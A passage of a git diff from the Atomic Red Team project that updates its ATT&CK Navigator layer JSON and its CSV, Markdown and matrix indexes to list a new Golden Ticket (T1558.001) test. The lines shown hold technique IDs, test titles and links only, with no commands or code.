techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index cfd03dde..67809902 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -198,6 +198,7 @@ credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credential credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell +credential-access,T1558.001,Golden Ticket,1,Crafting golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 90800cd4..eb51beb2 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -8,6 +8,7 @@ credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credential credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell +credential-access,T1558.001,Golden Ticket,1,Crafting golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 37dc3296..444354bd 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -411,7 +411,8 @@ - [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md) - Atomic Test #1: AppleScript - Prompt User for Password [macos] - Atomic Test #2: PowerShell - Prompt User for Password [windows] -- T1558.001 Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1558.001 Golden Ticket](../../T1558.001/T1558.001.md) + - Atomic Test #1: Crafting golden tickets with mimikatz [windows] - [T1552.006 Group Policy Preferences](../../T1552.006/T1552.006.md) - Atomic Test #1: GPP Passwords (findstr) [windows] - Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 503a9d2d..e2c5f731 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -24,7 +24,8 @@ - T1187 Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md) - Atomic Test #2: PowerShell - Prompt User for Password [windows] -- T1558.001 Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1558.001 Golden Ticket](../../T1558.001/T1558.001.md) + - Atomic Test #1: Crafting golden tickets with mimikatz [windows] - [T1552.006 Group Policy Preferences](../../T1552.006/T1552.006.md) - Atomic Test #1: GPP Passwords (findstr) [windows] - Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows] diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index 6003ff26..9bed094c 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md @@ -19,7 +19,7 @@ | Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A 